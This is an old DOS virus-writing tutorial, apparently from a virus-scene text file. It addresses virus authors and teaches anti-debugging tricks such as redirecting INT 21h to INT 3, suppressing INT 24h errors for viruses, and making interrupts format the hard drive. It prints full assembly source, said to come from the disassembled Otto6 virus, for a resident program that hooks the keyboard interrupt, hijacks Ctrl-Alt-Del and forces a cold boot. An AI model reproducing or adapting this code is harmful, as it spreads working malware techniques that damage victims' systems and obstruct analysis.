SOURCE00.008 - Programming Tricks
There are many possible tricks, but I won't get into all of them. The one thing that you really need to know, is that all debuggers won't call interrupt 8, and only debuggers call interrupts 1 and 3. Using this knowledge, you should be able to come up with some interesting solutions to your problem of people trying to get your source code.
Take this code for example:
mov ax,3521h ; Get the INT 21h address
int 21h ; Do it!
push es ; Move the extra segment to the
pop ds ; Data segment
xchg bx, dx ; Set up the INT 21h address
mov ax, 2503h ; This will make INT 21h = INT 3
int 21h ; Do it!
It's one that I prefer to use. Anybody who actually knows anything, will realize what you're doing, and single-step over this code, but there are people who don't know what is going on, and who will consequently infect their system. This code has a double value. Not only will it fuck up the debugger when they try to trace through it, but it will also make your code smaller if you use interrupt 21h a lot. The reason? It's very elementary, INT 21h is two bytes long 'CD 21', but interrupt 3 is only 'CC'. So, after you code this, just use int 3, instead of int 21h. The code is 14 bytes in length, so if you use int 21h 15 times or more, then the code is definatly worth it.
Another trick is for those annoying errors of INT 24h, like general error, etc. If your virus is of that nature, that this may happen when someone runs the file, then use this code:
mov ax, 3524h ; Get INT 24h address
int 3h ; The 'Old' INT 21h
push cs ; The code needs CS = DS
pop ds
lea dx, [bp+INT24] ; Set up the new INT 24h
mov ax, 2524h ; Function 25 - Set INT
int 3h ; Do it!
INT24:
mov al, 0003h ; This is the new INT 24h
iret ; Interrupt Return
You could also disable other interrupts, or have them do whatever you want. Maybe you want to set interrupt one to format the hard drive or something. Or, you could get creative, like this program:
.model tiny
.code
org 100h
begin: mov ah,9 ; Print the message
mov dx,offset logon ; Load the message into mem.
int 21h ; Print it!
mov ax, 0B0B0h ; Check to see if we're in mem
int 9 ; The trapped vector
cmp cx, 0B0B0h ; The check byte
jz exit ; If we're in mem., then quit
mov ax, 3509h ; Get the address for int 9
int 21h ; Do it!
mov word ptr [old9+1], bx ; Save the segment:offset for
mov word ptr [old9+3], es ; for later use
mov ax, 2509h ; Set int vector
mov dx, offset int9 ; To OUR int 9
int 21h ; Do it!
mov dx, offset last ; Set last byte to keep in mem
int 27h ; Go TSR
exit: int 20h
int9: cmp ax, 0B0Bh ; Function to check TSR
jnz cont ; If not that func, then cont.
xchg ax,cx ; Set reg so we don't go TSR 2x
IRet ; Return
cont:
push ax bx ds
xor ax,ax
mov ds,ax ; Clear the Data seg.
in al,60h ; get keyboard input
mov bl, byte ptr ds:[0417h] ; get shift status
test bl,08 ; alt pressed?
jz bye ; no
test bl,04 ; ctrl pressed?
jz bye
cmp al, 53h ; delete?
jnz bye ; nope!
and bl,0F3h ; mask off bits
mov byte ptr ds:[0417h],bl ; place in bios
jmp ok ; go on
bye:
pop ds bx ax ; remove registers
; jmp return ; more wierd
db 0e9h, 20h, 00 ; encoding!
ok:
push cs ; ds = cs
pop ds
mov ax,3 ; 80x25 text mode
int 10h
mov ah,2 ; set cpos
mov bh,0
mov dx,0A14h ; 10,20
int 10h
mov si,offset ourbyte
looper:
loop looper
lodsb ; load string byte
cmp al,0 ; end of string?
je coldbootus ; yes
mov ah,0Eh ; display char in al
int 10h
jmp looper
return:
old9 db 0EAh ; JMP FAR PTR
dd 00000000 ; Int 9h
ourbyte db 'Greetings to all viral writers!',0
logon db 7,7,7,'I aM a CooLie!!!$'
coldbootus:
mov dx,28h
mov ds,dx ; DS = 0028h
mov word ptr ds:[0072h],0 ; DS:0072h=0
db 0EAh ; JMP FAR PTR
db 00h, 00h, 0FFh, 0FFh ; Cold Boot Vector
endofit:
end begin
<EOC>
What it will do, is go memory resident, beep three times and print 'I aM a CooLie!!!' on the screen. When you press ALT-CTRL-DEL, it will intercept the function, and print 'Greetings to all viral writters!', then do a coldboot. It was taken from the Otto6 Virus, disassembled by The Additude Adjuster of Virulent Graffiti. There is no limit to what a virus can do. It's limited only by your imagination.
- Havoc
